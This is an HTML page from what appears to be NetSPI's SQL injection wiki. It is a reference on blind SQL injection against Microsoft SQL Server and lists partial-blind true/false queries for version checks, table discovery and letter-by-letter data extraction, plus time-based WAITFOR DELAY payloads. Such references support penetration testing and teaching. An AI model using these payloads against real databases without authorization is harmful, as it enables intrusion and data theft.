SQLInjectionWiki/injectionTypes/blindBased/sqlserver.html at master · NetSPI/SQLInjectionWiki · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<h3 id="blind-injection">Blind Injection</h3>

<p class="pageDescription">{{site.data.injectionDescriptions.blindBased}}</p>

<h4 class="subheading">Partial-Blind</h4>

<p>Partial-blind injections can be determined by differing HTTP status codes, response times, content-lengths, and HTML contents in the HTTP response. These markers can indicate true or false statements. The queries below will attempt to exploit the injection by asserting a true or false response upon guessed
  information. True or false queries can also be identified by returning 1(True) or 0(False) rows. An error can also be used to identify 0(False).</p>
<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th>Description</th>
      <th>Query</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Version is 12.0.2000.8</td>
      <td>SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'</td>
    </tr>
    <tr>
      <td>Subselect is enabled</td>
      <td>SELECT (SELECT @@version)</td>
    </tr>
    <tr>
      <td>Table log_table exists</td>
      <td>SELECT* FROM log_table</td>
    </tr>
    <tr>
      <td>Column message exists in table log_table</td>
      <td>SELECT message from log_table</td>
    </tr>
    <tr>
      <td>First letter of first message is t</td>
      <td>WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)<br/> SELECT message FROM data WHERE row = 1 and message like 't%'</td>
    </tr>
  </tbody>
</table>


<h4 class="subheading">Converting Partial-Blind queries to Full-Blind queries</h4>

<p>Any of the above queries can be used in full-blind scenarios by using the following conversion: <br/><code>IF exists(*PARTIAL_BLIND_QUERY*) WAITFOR DELAY '00:00:02'</code></p>


<h4 class="subheading">Full-Blind</h4>

<p>Full-blind queries do not indicate any result of the query in the HTTP/HTML response. This makes them dependent upon timing functions and other <a class="link" href="{{site.pagebase}}/attackQueries/dataExfiltration">out-of-band methods</a> for attacks.  A true statement will take X seconds to respond, a false statement should return immediately.</p>

<table class="table table-striped table-hover">
  <thead>
    <tr>
      <th>Description</th>
      <th align="left">Query</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>Version is 12.0.2000.8</td>
      <td>IF exists(SELECT @@version where @@version like '%12.0.2000.8%') WAITFOR DELAY '00:00:02'</td>
    </tr>
  </tbody>
</table>